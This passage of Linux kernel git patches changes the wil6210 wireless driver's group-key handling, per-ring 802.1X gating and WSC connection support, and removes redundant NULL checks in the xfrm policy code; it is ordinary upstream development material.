distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +#include + +#define PCM_DATA_INVALID_DW_VAL (0xB0BA0000) + +void wil_pmc_init(struct wil6210_priv *wil); +void wil_pmc_alloc(struct wil6210_priv *wil, + int num_descriptors, int descriptor_size); +void wil_pmc_free(struct wil6210_priv *wil, int send_pmc_cmd); +int wil_pmc_last_cmd_status(struct wil6210_priv *wil); +ssize_t wil_pmc_read(struct file *, char __user *, size_t, loff_t *); +loff_t wil_pmc_llseek(struct file *filp, loff_t off, int whence); diff --git a/drivers/net/wireless/ath/wil6210/wil6210.h b/drivers/net/wireless/ath/wil6210/wil6210.h index abb2080d3fa1..9d74bd819236 100644 --- a/drivers/net/wireless/ath/wil6210/wil6210.h +++ b/drivers/net/wireless/ath/wil6210/wil6210.h @@ -21,6 +21,7 @@ #include #include #include +#include #include "wil_platform.h" extern bool no_fw_recovery; @@ -527,6 +528,17 @@ struct wil_probe_client_req { u8 cid; }; +struct pmc_ctx { + /* alloc, free, and read operations must own the lock */ + struct mutex lock; + struct vring_tx_desc *pring_va; + dma_addr_t pring_pa; + struct desc_alloc_info *descriptors; + int last_cmd_status; + int num_descriptors; + int descriptor_size; +}; + struct wil6210_priv { struct pci_dev *pdev; int n_msi; @@ -611,6 +623,8 @@ struct wil6210_priv { void *platform_handle; struct wil_platform_ops platform_ops; + + struct pmc_ctx pmc; }; #define wil_to_wiphy(i) (i->wdev->wiphy) diff --git a/drivers/net/wireless/ath/wil6210/wmi.h b/drivers/net/wireless/ath/wil6210/wmi.h index b29055315350..24c253d91363 100644 --- a/drivers/net/wireless/ath/wil6210/wmi.h +++ b/drivers/net/wireless/ath/wil6210/wmi.h @@ -835,6 +835,21 @@ struct wmi_temp_sense_cmd { __le32 measure_mode; } __packed; +/* + * WMI_PMC_CMDID + */ +enum wmi_pmc_op_e { + WMI_PMC_ALLOCATE = 0, + WMI_PMC_RELEASE = 1, +}; + +struct wmi_pmc_cmd { + u8 op; /* enum wmi_pmc_cmd_op_type */ + u8 reserved; + __le16 ring_size; + __le64 mem_base; +} __packed; + /* * WMI Events */ From 230d8442f452509b371e8765218b3a876d5b575c Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:10 +0300 Subject: [PATCH 020/872] wil6210: broadcast for secure link Introduce 2 types of GTK, Tx (for this STA) and Rx (for each peer). Now, AP has only Tx GTK, STA - only Rx one. PBSS not supported yet; for it, continue using pseudo-DMS. Handle per-vring .1x state, update it from WMI_VRING_EN_EVENTID event. This allows unification for unicast and broadcast vrings. This mechanism replaces former per-CID "data_port_open" Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 64 ++++++++++++++----- drivers/net/wireless/ath/wil6210/debugfs.c | 14 ++--- drivers/net/wireless/ath/wil6210/main.c | 6 +- drivers/net/wireless/ath/wil6210/txrx.c | 46 +++++++------- drivers/net/wireless/ath/wil6210/wil6210.h | 7 ++- drivers/net/wireless/ath/wil6210/wmi.c | 68 ++++++--------------- drivers/net/wireless/ath/wil6210/wmi.h | 25 +++++--- 7 files changed, 124 insertions(+), 106 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index f53a1908fae2..1b02b73c4212 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -425,10 +425,17 @@ static int wil_cfg80211_connect(struct wiphy *wiphy, wil->privacy = sme->privacy; if (wil->privacy) { - /* For secure assoc, send WMI_DELETE_CIPHER_KEY_CMD */ - rc = wmi_del_cipher_key(wil, 0, bss->bssid); + /* For secure assoc, remove old keys */ + rc = wmi_del_cipher_key(wil, 0, bss->bssid, + WMI_KEY_USE_PAIRWISE); if (rc) { - wil_err(wil, "WMI_DELETE_CIPHER_KEY_CMD failed\n"); + wil_err(wil, "WMI_DELETE_CIPHER_KEY_CMD(PTK) failed\n"); + goto out; + } + rc = wmi_del_cipher_key(wil, 0, bss->bssid, + WMI_KEY_USE_RX_GROUP); + if (rc) { + wil_err(wil, "WMI_DELETE_CIPHER_KEY_CMD(GTK) failed\n"); goto out; } } @@ -462,6 +469,8 @@ static int wil_cfg80211_connect(struct wiphy *wiphy, conn.auth_mode = WMI_AUTH_WPA2_PSK; conn.pairwise_crypto_type = WMI_CRYPT_AES_GCMP; conn.pairwise_crypto_len = 16; + conn.group_crypto_type = WMI_CRYPT_AES_GCMP; + conn.group_crypto_len = 16; } else { conn.dot11_auth_mode = WMI_AUTH11_OPEN; conn.auth_mode = WMI_AUTH_NONE; @@ -563,6 +572,39 @@ static int wil_cfg80211_set_channel(struct wiphy *wiphy, return 0; } +static enum wmi_key_usage wil_detect_key_usage(struct wil6210_priv *wil, + bool pairwise) +{ + struct wireless_dev *wdev = wil->wdev; + enum wmi_key_usage rc; + static const char * const key_usage_str[] = { + [WMI_KEY_USE_PAIRWISE] = "WMI_KEY_USE_PAIRWISE", + [WMI_KEY_USE_RX_GROUP] = "WMI_KEY_USE_RX_GROUP", + [WMI_KEY_USE_TX_GROUP] = "WMI_KEY_USE_TX_GROUP", + }; + + if (pairwise) { + rc = WMI_KEY_USE_PAIRWISE; + } else { + switch (wdev->iftype) { + case NL80211_IFTYPE_STATION: + rc = WMI_KEY_USE_RX_GROUP; + break; + case NL80211_IFTYPE_AP: + rc = WMI_KEY_USE_TX_GROUP; + break; + default: + /* TODO: Rx GTK or Tx GTK? */ + wil_err(wil, "Can't determine GTK type\n"); + rc = WMI_KEY_USE_RX_GROUP; + break; + } + } + wil_dbg_misc(wil, "%s() -> %s\n", __func__, key_usage_str[rc]); + + return rc; +} + static int wil_cfg80211_add_key(struct wiphy *wiphy, struct net_device *ndev, u8 key_index, bool pairwise, @@ -570,16 +612,13 @@ static int wil_cfg80211_add_key(struct wiphy *wiphy, struct key_params *params) { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + enum wmi_key_usage key_usage = wil_detect_key_usage(wil, pairwise); wil_dbg_misc(wil, "%s(%pM[%d] %s)\n", __func__, mac_addr, key_index, pairwise ? "PTK" : "GTK"); - /* group key is not used */ - if (!pairwise) - return 0; - - return wmi_add_cipher_key(wil, key_index, mac_addr, - params->key_len, params->key); + return wmi_add_cipher_key(wil, key_index, mac_addr, params->key_len, + params->key, key_usage); } static int wil_cfg80211_del_key(struct wiphy *wiphy, @@ -588,15 +627,12 @@ static int wil_cfg80211_del_key(struct wiphy *wiphy, const u8 *mac_addr) { struct wil6210_priv *wil = wiphy_to_wil(wiphy); + enum wmi_key_usage key_usage = wil_detect_key_usage(wil, pairwise); wil_dbg_misc(wil, "%s(%pM[%d] %s)\n", __func__, mac_addr, key_index, pairwise ? "PTK" : "GTK"); - /* group key is not used */ - if (!pairwise) - return 0; - - return wmi_del_cipher_key(wil, key_index, mac_addr); + return wmi_del_cipher_key(wil, key_index, mac_addr, key_usage); } /* Need to be present or wiphy_new() will WARN */ diff --git a/drivers/net/wireless/ath/wil6210/debugfs.c b/drivers/net/wireless/ath/wil6210/debugfs.c index 19f77e55dc53..8f9c0722a801 100644 --- a/drivers/net/wireless/ath/wil6210/debugfs.c +++ b/drivers/net/wireless/ath/wil6210/debugfs.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2012-2014 Qualcomm Atheros, Inc. + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. * * Permission to use, copy, modify, and/or distribute this software for any * purpose with or without fee is hereby granted, provided that the above @@ -124,15 +124,17 @@ static int wil_vring_debugfs_show(struct seq_file *s, void *data) if (cid < WIL6210_MAX_CID) seq_printf(s, - "\n%pM CID %d TID %d BACK([%u] %u TU A%s) [%3d|%3d] idle %s\n", + "\n%pM CID %d TID %d 1x%s BACK([%u] %u TU A%s) [%3d|%3d] idle %s\n", wil->sta[cid].addr, cid, tid, + txdata->dot1x_open ? "+" : "-", txdata->agg_wsize, txdata->agg_timeout, txdata->agg_amsdu ? "+" : "-", used, avail, sidle); else seq_printf(s, - "\nBroadcast [%3d|%3d] idle %s\n", + "\nBroadcast 1x%s [%3d|%3d] idle %s\n", + txdata->dot1x_open ? "+" : "-", used, avail, sidle); wil_print_vring(s, wil, name, vring, '_', 'H'); @@ -1195,8 +1197,7 @@ static int wil_link_debugfs_show(struct seq_file *s, void *data) status = "connected"; break; } - seq_printf(s, "[%d] %pM %s%s\n", i, p->addr, status, - (p->data_port_open ? " data_port_open" : "")); + seq_printf(s, "[%d] %pM %s\n", i, p->addr, status); if (p->status == wil_sta_connected) { rc = wil_cid_fill_sinfo(wil, i, &sinfo); @@ -1376,8 +1377,7 @@ __acquires(&p->tid_rx_lock) __releases(&p->tid_rx_lock) status = "connected"; break; } - seq_printf(s, "[%d] %pM %s%s\n", i, p->addr, status, - (p->data_port_open ? " data_port_open" : "")); + seq_printf(s, "[%d] %pM %s\n", i, p->addr, status); if (p->status == wil_sta_connected) { spin_lock_bh(&p->tid_rx_lock); diff --git a/drivers/net/wireless/ath/wil6210/main.c b/drivers/net/wireless/ath/wil6210/main.c index 146fd8088fde..ef3b6bca8cb5 100644 --- a/drivers/net/wireless/ath/wil6210/main.c +++ b/drivers/net/wireless/ath/wil6210/main.c @@ -150,7 +150,6 @@ __acquires(&sta->tid_rx_lock) __releases(&sta->tid_rx_lock) wil_dbg_misc(wil, "%s(CID %d, status %d)\n", __func__, cid, sta->status); - sta->data_port_open = false; if (sta->status != wil_sta_unused) { if (!from_event) wmi_disconnect_sta(wil, sta->addr, reason_code); @@ -377,9 +376,10 @@ int wil_bcast_init(struct wil6210_priv *wil) if (ri < 0) return ri; + wil->bcast_vring = ri; rc = wil_vring_init_bcast(wil, ri, 1 << bcast_ring_order); - if (rc == 0) - wil->bcast_vring = ri; + if (rc) + wil->bcast_vring = -1; return rc; } diff --git a/drivers/net/wireless/ath/wil6210/txrx.c b/drivers/net/wireless/ath/wil6210/txrx.c index 1fd34e5e9824..0113dac3a9a9 100644 --- a/drivers/net/wireless/ath/wil6210/txrx.c +++ b/drivers/net/wireless/ath/wil6210/txrx.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2012-2014 Qualcomm Atheros, Inc. + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. * * Permission to use, copy, modify, and/or distribute this software for any * purpose with or without fee is hereby granted, provided that the above @@ -724,6 +724,8 @@ int wil_vring_init_tx(struct wil6210_priv *wil, int id, int size, cmd.vring_cfg.tx_sw_ring.ring_mem_base = cpu_to_le64(vring->pa); + if (!wil->privacy) + txdata->dot1x_open = true; rc = wmi_call(wil, WMI_VRING_CFG_CMDID, &cmd, sizeof(cmd), WMI_VRING_CFG_DONE_EVENTID, &reply, sizeof(reply), 100); if (rc) @@ -738,11 +740,13 @@ int wil_vring_init_tx(struct wil6210_priv *wil, int id, int size, vring->hwtail = le32_to_cpu(reply.cmd.tx_vring_tail_ptr); txdata->enabled = 1; - if (wil->sta[cid].data_port_open && (agg_wsize >= 0)) + if (txdata->dot1x_open && (agg_wsize >= 0)) wil_addba_tx_request(wil, id, agg_wsize); return 0; out_free: + txdata->dot1x_open = false; + txdata->enabled = 0; wil_vring_free(wil, vring, 1); out: @@ -792,6 +796,8 @@ int wil_vring_init_bcast(struct wil6210_priv *wil, int id, int size) cmd.vring_cfg.tx_sw_ring.ring_mem_base = cpu_to_le64(vring->pa); + if (!wil->privacy) + txdata->dot1x_open = true; rc = wmi_call(wil, WMI_BCAST_VRING_CFG_CMDID, &cmd, sizeof(cmd), WMI_VRING_CFG_DONE_EVENTID, &reply, sizeof(reply), 100); if (rc) @@ -809,6 +815,8 @@ int wil_vring_init_bcast(struct wil6210_priv *wil, int id, int size) return 0; out_free: + txdata->enabled = 0; + txdata->dot1x_open = false; wil_vring_free(wil, vring, 1); out: @@ -828,6 +836,7 @@ void wil_vring_fini_tx(struct wil6210_priv *wil, int id) wil_dbg_misc(wil, "%s() id=%d\n", __func__, id); spin_lock_bh(&txdata->lock); + txdata->dot1x_open = false; txdata->enabled = 0; /* no Tx can be in progress or start anew */ spin_unlock_bh(&txdata->lock); /* make sure NAPI won't touch this vring */ @@ -848,12 +857,11 @@ static struct vring *wil_find_tx_ucast(struct wil6210_priv *wil, if (cid < 0) return NULL; - if (!wil->sta[cid].data_port_open && - (skb->protocol != cpu_to_be16(ETH_P_PAE))) - return NULL; - /* TODO: fix for multiple TID */ for (i = 0; i < ARRAY_SIZE(wil->vring2cid_tid); i++) { + if (!wil->vring_tx_data[i].dot1x_open && + (skb->protocol != cpu_to_be16(ETH_P_PAE))) + continue; if (wil->vring2cid_tid[i][0] == cid) { struct vring *v = &wil->vring_tx[i]; @@ -883,7 +891,7 @@ static struct vring *wil_find_tx_vring_sta(struct wil6210_priv *wil, /* In the STA mode, it is expected to have only 1 VRING * for the AP we connected to. - * find 1-st vring and see whether it is eligible for data + * find 1-st vring eligible for this skb and use it. */ for (i = 0; i < WIL6210_MAX_TX_RINGS; i++) { v = &wil->vring_tx[i]; @@ -894,9 +902,9 @@ static struct vring *wil_find_tx_vring_sta(struct wil6210_priv *wil, if (cid >= WIL6210_MAX_CID) /* skip BCAST */ continue; - if (!wil->sta[cid].data_port_open && + if (!wil->vring_tx_data[i].dot1x_open && (skb->protocol != cpu_to_be16(ETH_P_PAE))) - break; + continue; wil_dbg_txrx(wil, "Tx -> ring %d\n", i); @@ -918,7 +926,6 @@ static struct vring *wil_find_tx_vring_sta(struct wil6210_priv *wil, * in all cases override dest address to unicast peer's address * Use old strategy when new is not supported yet: * - for PBSS - * - for secure link */ static struct vring *wil_find_tx_bcast_1(struct wil6210_priv *wil, struct sk_buff *skb) @@ -931,6 +938,9 @@ static struct vring *wil_find_tx_bcast_1(struct wil6210_priv *wil, v = &wil->vring_tx[i]; if (!v->va) return NULL; + if (!wil->vring_tx_data[i].dot1x_open && + (skb->protocol != cpu_to_be16(ETH_P_PAE))) + return NULL; return v; } @@ -963,7 +973,8 @@ static struct vring *wil_find_tx_bcast_2(struct wil6210_priv *wil, cid = wil->vring2cid_tid[i][0]; if (cid >= WIL6210_MAX_CID) /* skip BCAST */ continue; - if (!wil->sta[cid].data_port_open) + if (!wil->vring_tx_data[i].dot1x_open && + (skb->protocol != cpu_to_be16(ETH_P_PAE))) continue; /* don't Tx back to source when re-routing Rx->Tx at the AP */ @@ -989,7 +1000,8 @@ static struct vring *wil_find_tx_bcast_2(struct wil6210_priv *wil, cid = wil->vring2cid_tid[i][0]; if (cid >= WIL6210_MAX_CID) /* skip BCAST */ continue; - if (!wil->sta[cid].data_port_open) + if (!wil->vring_tx_data[i].dot1x_open && + (skb->protocol != cpu_to_be16(ETH_P_PAE))) continue; if (0 == memcmp(wil->sta[cid].addr, src, ETH_ALEN)) @@ -1016,9 +1028,6 @@ static struct vring *wil_find_tx_bcast(struct wil6210_priv *wil, if (wdev->iftype != NL80211_IFTYPE_AP) return wil_find_tx_bcast_2(wil, skb); - if (wil->privacy) - return wil_find_tx_bcast_2(wil, skb); - return wil_find_tx_bcast_1(wil, skb); } @@ -1144,13 +1153,8 @@ static int __wil_tx_vring(struct wil6210_priv *wil, struct vring *vring, wil_tx_desc_map(d, pa, len, vring_index); if (unlikely(mcast)) { d->mac.d[0] |= BIT(MAC_CFG_DESC_TX_0_MCS_EN_POS); /* MCS 0 */ - if (unlikely(len > WIL_BCAST_MCS0_LIMIT)) { - /* set MCS 1 */ + if (unlikely(len > WIL_BCAST_MCS0_LIMIT)) /* set MCS 1 */ d->mac.d[0] |= (1 << MAC_CFG_DESC_TX_0_MCS_INDEX_POS); - /* packet mode 2 */ - d->mac.d[1] |= BIT(MAC_CFG_DESC_TX_1_PKT_MODE_EN_POS) | - (2 << MAC_CFG_DESC_TX_1_PKT_MODE_POS); - } } /* Process TCP/UDP checksum offloading */ if (unlikely(wil_tx_desc_offload_cksum_set(wil, d, skb))) { diff --git a/drivers/net/wireless/ath/wil6210/wil6210.h b/drivers/net/wireless/ath/wil6210/wil6210.h index 9d74bd819236..f3513a1fa424 100644 --- a/drivers/net/wireless/ath/wil6210/wil6210.h +++ b/drivers/net/wireless/ath/wil6210/wil6210.h @@ -398,6 +398,7 @@ struct vring { * Additional data for Tx Vring */ struct vring_tx_data { + bool dot1x_open; int enabled; cycles_t idle, last_idle, begin; u8 agg_wsize; /* agreed aggregation window, 0 - no agg */ @@ -486,7 +487,6 @@ struct wil_sta_info { u8 addr[ETH_ALEN]; enum wil_sta_status status; struct wil_net_stats stats; - bool data_port_open; /* can send any data, not only EAPOL */ /* Rx BACK */ struct wil_tid_ampdu_rx *tid_rx[WIL_STA_TID_NUM]; spinlock_t tid_rx_lock; /* guarding tid_rx array */ @@ -716,9 +716,10 @@ int wmi_get_ssid(struct wil6210_priv *wil, u8 *ssid_len, void *ssid); int wmi_set_channel(struct wil6210_priv *wil, int channel); int wmi_get_channel(struct wil6210_priv *wil, int *channel); int wmi_del_cipher_key(struct wil6210_priv *wil, u8 key_index, - const void *mac_addr); + const void *mac_addr, int key_usage); int wmi_add_cipher_key(struct wil6210_priv *wil, u8 key_index, - const void *mac_addr, int key_len, const void *key); + const void *mac_addr, int key_len, const void *key, + int key_usage); int wmi_echo(struct wil6210_priv *wil); int wmi_set_ie(struct wil6210_priv *wil, u8 type, u16 ie_len, const void *ie); int wmi_rx_chain_add(struct wil6210_priv *wil, struct vring *vring); diff --git a/drivers/net/wireless/ath/wil6210/wmi.c b/drivers/net/wireless/ath/wil6210/wmi.c index 04fad5f4bbea..3dc8daf69bd2 100644 --- a/drivers/net/wireless/ath/wil6210/wmi.c +++ b/drivers/net/wireless/ath/wil6210/wmi.c @@ -1,5 +1,5 @@ /* - * Copyright (c) 2012-2014 Qualcomm Atheros, Inc. + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. * * Permission to use, copy, modify, and/or distribute this software for any * purpose with or without fee is hereby granted, provided that the above @@ -543,55 +543,22 @@ static void wmi_evt_eapol_rx(struct wil6210_priv *wil, int id, } } -static void wil_addba_tx_cid(struct wil6210_priv *wil, u8 cid, u16 wsize) +static void wmi_evt_vring_en(struct wil6210_priv *wil, int id, void *d, int len) { - struct vring_tx_data *t; - int i; + struct wmi_vring_en_event *evt = d; + u8 vri = evt->vring_index; - for (i = 0; i < WIL6210_MAX_TX_RINGS; i++) { - if (cid != wil->vring2cid_tid[i][0]) - continue; - t = &wil->vring_tx_data[i]; - if (!t->enabled) - continue; + wil_dbg_wmi(wil, "Enable vring %d\n", vri); - wil_addba_tx_request(wil, i, wsize); - } -} - -static void wmi_evt_linkup(struct wil6210_priv *wil, int id, void *d, int len) -{ - struct wmi_data_port_open_event *evt = d; - u8 cid = evt->cid; - - wil_dbg_wmi(wil, "Link UP for CID %d\n", cid); - - if (cid >= ARRAY_SIZE(wil->sta)) { - wil_err(wil, "Link UP for invalid CID %d\n", cid); + if (vri >= ARRAY_SIZE(wil->vring_tx)) { + wil_err(wil, "Enable for invalid vring %d\n", vri); return; } - - wil->sta[cid].data_port_open = true; - if (agg_wsize >= 0) - wil_addba_tx_cid(wil, cid, agg_wsize); -} - -static void wmi_evt_linkdown(struct wil6210_priv *wil, int id, void *d, int len) -{ - struct net_device *ndev = wil_to_ndev(wil); - struct wmi_wbe_link_down_event *evt = d; - u8 cid = evt->cid; - - wil_dbg_wmi(wil, "Link DOWN for CID %d, reason %d\n", - cid, le32_to_cpu(evt->reason)); - - if (cid >= ARRAY_SIZE(wil->sta)) { - wil_err(wil, "Link DOWN for invalid CID %d\n", cid); + wil->vring_tx_data[vri].dot1x_open = true; + if (vri == wil->bcast_vring) /* no BA for bcast */ return; - } - - wil->sta[cid].data_port_open = false; - netif_carrier_off(ndev); + if (agg_wsize >= 0) + wil_addba_tx_request(wil, vri, agg_wsize); } static void wmi_evt_ba_status(struct wil6210_priv *wil, int id, void *d, @@ -695,11 +662,10 @@ static const struct { {WMI_CONNECT_EVENTID, wmi_evt_connect}, {WMI_DISCONNECT_EVENTID, wmi_evt_disconnect}, {WMI_EAPOL_RX_EVENTID, wmi_evt_eapol_rx}, - {WMI_DATA_PORT_OPEN_EVENTID, wmi_evt_linkup}, - {WMI_WBE_LINKDOWN_EVENTID, wmi_evt_linkdown}, {WMI_BA_STATUS_EVENTID, wmi_evt_ba_status}, {WMI_RCP_ADDBA_REQ_EVENTID, wmi_evt_addba_rx_req}, {WMI_DELBA_EVENTID, wmi_evt_delba}, + {WMI_VRING_EN_EVENTID, wmi_evt_vring_en}, }; /* @@ -985,7 +951,7 @@ int wmi_p2p_cfg(struct wil6210_priv *wil, int channel) } int wmi_del_cipher_key(struct wil6210_priv *wil, u8 key_index, - const void *mac_addr) + const void *mac_addr, int key_usage) { struct wmi_delete_cipher_key_cmd cmd = { .key_index = key_index, @@ -998,11 +964,12 @@ int wmi_del_cipher_key(struct wil6210_priv *wil, u8 key_index, } int wmi_add_cipher_key(struct wil6210_priv *wil, u8 key_index, - const void *mac_addr, int key_len, const void *key) + const void *mac_addr, int key_len, const void *key, + int key_usage) { struct wmi_add_cipher_key_cmd cmd = { .key_index = key_index, - .key_usage = WMI_KEY_USE_PAIRWISE, + .key_usage = key_usage, .key_len = key_len, }; @@ -1238,7 +1205,8 @@ int wmi_addba_rx_resp(struct wil6210_priv *wil, u8 cid, u8 tid, u8 token, cid, tid, agg_wsize, timeout, status, amsdu ? "+" : "-"); rc = wmi_call(wil, WMI_RCP_ADDBA_RESP_CMDID, &cmd, sizeof(cmd), - WMI_ADDBA_RESP_SENT_EVENTID, &reply, sizeof(reply), 100); + WMI_RCP_ADDBA_RESP_SENT_EVENTID, &reply, sizeof(reply), + 100); if (rc) return rc; diff --git a/drivers/net/wireless/ath/wil6210/wmi.h b/drivers/net/wireless/ath/wil6210/wmi.h index 24c253d91363..cc04ab73b398 100644 --- a/drivers/net/wireless/ath/wil6210/wmi.h +++ b/drivers/net/wireless/ath/wil6210/wmi.h @@ -1,5 +1,5 @@ /* - * Copyright (c) 2012-2014 Qualcomm Atheros, Inc. + * Copyright (c) 2012-2015 Qualcomm Atheros, Inc. * Copyright (c) 2006-2012 Wilocity . * * Permission to use, copy, modify, and/or distribute this software for any @@ -253,8 +253,8 @@ struct wmi_set_passphrase_cmd { */ enum wmi_key_usage { WMI_KEY_USE_PAIRWISE = 0, - WMI_KEY_USE_GROUP = 1, - WMI_KEY_USE_TX = 2, /* default Tx Key - Static WEP only */ + WMI_KEY_USE_RX_GROUP = 1, + WMI_KEY_USE_TX_GROUP = 2, }; struct wmi_add_cipher_key_cmd { @@ -885,7 +885,7 @@ enum wmi_event_id { WMI_VRING_CFG_DONE_EVENTID = 0x1821, WMI_BA_STATUS_EVENTID = 0x1823, WMI_RCP_ADDBA_REQ_EVENTID = 0x1824, - WMI_ADDBA_RESP_SENT_EVENTID = 0x1825, + WMI_RCP_ADDBA_RESP_SENT_EVENTID = 0x1825, WMI_DELBA_EVENTID = 0x1826, WMI_GET_SSID_EVENTID = 0x1828, WMI_GET_PCP_CHANNEL_EVENTID = 0x182a, @@ -897,7 +897,7 @@ enum wmi_event_id { WMI_WRITE_MAC_TXQ_EVENTID = 0x1833, WMI_WRITE_MAC_XQ_FIELD_EVENTID = 0x1834, - WMI_BEAFORMING_MGMT_DONE_EVENTID = 0x1836, + WMI_BEAMFORMING_MGMT_DONE_EVENTID = 0x1836, WMI_BF_TXSS_MGMT_DONE_EVENTID = 0x1837, WMI_BF_RXSS_MGMT_DONE_EVENTID = 0x1839, WMI_RS_MGMT_DONE_EVENTID = 0x1852, @@ -909,11 +909,12 @@ enum wmi_event_id { /* Performance monitoring events */ WMI_DATA_PORT_OPEN_EVENTID = 0x1860, - WMI_WBE_LINKDOWN_EVENTID = 0x1861, + WMI_WBE_LINK_DOWN_EVENTID = 0x1861, WMI_BF_CTRL_DONE_EVENTID = 0x1862, WMI_NOTIFY_REQ_DONE_EVENTID = 0x1863, WMI_GET_STATUS_DONE_EVENTID = 0x1864, + WMI_VRING_EN_EVENTID = 0x1865, WMI_UNIT_TEST_EVENTID = 0x1900, WMI_FLASH_READ_DONE_EVENTID = 0x1902, @@ -1162,7 +1163,7 @@ struct wmi_vring_cfg_done_event { } __packed; /* - * WMI_ADDBA_RESP_SENT_EVENTID + * WMI_RCP_ADDBA_RESP_SENT_EVENTID */ struct wmi_rcp_addba_resp_sent_event { u8 cidxtid; @@ -1194,7 +1195,7 @@ struct wmi_cfg_rx_chain_done_event { } __packed; /* - * WMI_WBE_LINKDOWN_EVENTID + * WMI_WBE_LINK_DOWN_EVENTID */ enum wmi_wbe_link_down_event_reason { WMI_WBE_REASON_USER_REQUEST = 0, @@ -1216,6 +1217,14 @@ struct wmi_data_port_open_event { u8 reserved[3]; } __packed; +/* + * WMI_VRING_EN_EVENTID + */ +struct wmi_vring_en_event { + u8 vring_index; + u8 reserved[3]; +} __packed; + /* * WMI_GET_PCP_CHANNEL_EVENTID */ From 27aa6b71d3ddd8e94613a890f06474db812cf591 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Thu, 30 Apr 2015 16:25:11 +0300 Subject: [PATCH 021/872] wil6210: support WSC for STA mode WSC connection is secure (privacy bit set in various frames) but authentication suite, keys etc. are absent. Support this mode in the connect WMI command. Detect WSC by having 'sme->privacy' and no RSN IE. Inform firmware about WSC session by setting dot11_auth_mode to WMI_AUTH11_WSC. Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/cfg80211.c | 26 +++++++++++---------- 1 file changed, 14 insertions(+), 12 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/cfg80211.c b/drivers/net/wireless/ath/wil6210/cfg80211.c index 1b02b73c4212..dbfcdd16628a 100644 --- a/drivers/net/wireless/ath/wil6210/cfg80211.c +++ b/drivers/net/wireless/ath/wil6210/cfg80211.c @@ -402,11 +402,8 @@ static int wil_cfg80211_connect(struct wiphy *wiphy, rsn_eid = sme->ie ? cfg80211_find_ie(WLAN_EID_RSN, sme->ie, sme->ie_len) : NULL; - - if (sme->privacy && !rsn_eid) { - wil_err(wil, "Missing RSN IE for secure connection\n"); - return -EINVAL; - } + if (sme->privacy && !rsn_eid) + wil_info(wil, "WSC connection\n"); bss = cfg80211_get_bss(wiphy, sme->channel, sme->bssid, sme->ssid, sme->ssid_len, @@ -465,13 +462,18 @@ static int wil_cfg80211_connect(struct wiphy *wiphy, goto out; } if (wil->privacy) { - conn.dot11_auth_mode = WMI_AUTH11_SHARED; - conn.auth_mode = WMI_AUTH_WPA2_PSK; - conn.pairwise_crypto_type = WMI_CRYPT_AES_GCMP; - conn.pairwise_crypto_len = 16; - conn.group_crypto_type = WMI_CRYPT_AES_GCMP; - conn.group_crypto_len = 16; - } else { + if (rsn_eid) { /* regular secure connection */ + conn.dot11_auth_mode = WMI_AUTH11_SHARED; + conn.auth_mode = WMI_AUTH_WPA2_PSK; + conn.pairwise_crypto_type = WMI_CRYPT_AES_GCMP; + conn.pairwise_crypto_len = 16; + conn.group_crypto_type = WMI_CRYPT_AES_GCMP; + conn.group_crypto_len = 16; + } else { /* WSC */ + conn.dot11_auth_mode = WMI_AUTH11_WSC; + conn.auth_mode = WMI_AUTH_NONE; + } + } else { /* insecure connection */ conn.dot11_auth_mode = WMI_AUTH11_OPEN; conn.auth_mode = WMI_AUTH_NONE; } From 586f2eb416f4271444e807b96346df3d30e8dfb5 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Thu, 30 Apr 2015 17:13:41 +0800 Subject: [PATCH 022/872] xfrm: remove the unnecessary checking before call xfrm_pol_hold xfrm_pol_hold will check its input with NULL Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_policy.c | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/net/xfrm/xfrm_policy.c b/net/xfrm/xfrm_policy.c index c4c47f337a3a..435bc0dc7630 100644 --- a/net/xfrm/xfrm_policy.c +++ b/net/xfrm/xfrm_policy.c @@ -1127,8 +1127,8 @@ static struct xfrm_policy *xfrm_policy_lookup_bytype(struct net *net, u8 type, break; } } - if (ret) - xfrm_pol_hold(ret); + + xfrm_pol_hold(ret); fail: read_unlock_bh(&net->xfrm.xfrm_policy_lock); @@ -3211,8 +3211,7 @@ static struct xfrm_policy *xfrm_migrate_policy_find(const struct xfrm_selector * } } - if (ret) - xfrm_pol_hold(ret); + xfrm_pol_hold(ret); read_unlock_bh(&net->xfrm.xfrm_policy_lock); From de2ad486cb6cfdf3ef79a96a18d78bb1b135c0e0 Mon Sep 17 00:00:00 2001 From: Li RongQing Date: Thu, 30 Apr 2015 17:25:19 +0800 Subject: [PATCH 023/872] xfrm: move the checking for old xfrm_policy hold_queue to beginning if hold_queue of old xfrm_policy is NULL, return directly, then not need to run other codes, especially take the spin lock Signed-off-by: Li RongQing Signed-off-by: Steffen Klassert --- net/xfrm/xfrm_policy.c | 6 +++--- 1 file changed, 3 insertions(+), 3 